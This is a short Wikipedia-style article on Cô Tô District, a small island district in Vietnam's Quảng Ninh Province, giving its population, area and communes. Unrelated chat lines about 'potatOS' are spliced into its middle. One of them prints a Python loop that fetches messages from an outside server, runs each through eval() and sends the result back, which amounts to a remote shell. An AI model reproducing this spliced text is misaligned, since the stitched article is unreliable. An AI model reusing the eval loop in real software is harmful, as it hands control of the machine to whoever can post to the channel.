Cô Tô District

Cô Tô (listen) is a small rural district of Quảng Ninh Province in the northeastern region of Vietnam. As of 2009 the district had a population of 4,985, is the lowest population district in Quảng Ninh.[1] The district covers an area of 47.3 km². The district capital lies at Cô Tô.[1]

Cô Tô District

Huyện đảo Cô Tô
Cô Tô Island District
Country Vietnam
RegionNortheast
ProvinceQuảng Ninh
CapitalCô Tô
Area
  Total18.3 sq mi (47.3 km2)
Population
 (2009)
  Total4,985
  Density270/sq mi (105/km2)
Time zoneUTC+7 (UTC + 7)

Administrative divisions

2 communes: Thanh Lân, Đồng Tiến and 1 town: Cô Tô.

gollark: This is *technically* a "web license lookup thing".
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.

References

  1. "Districts of Vietnam". Statoids. Retrieved March 23, 2009.

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.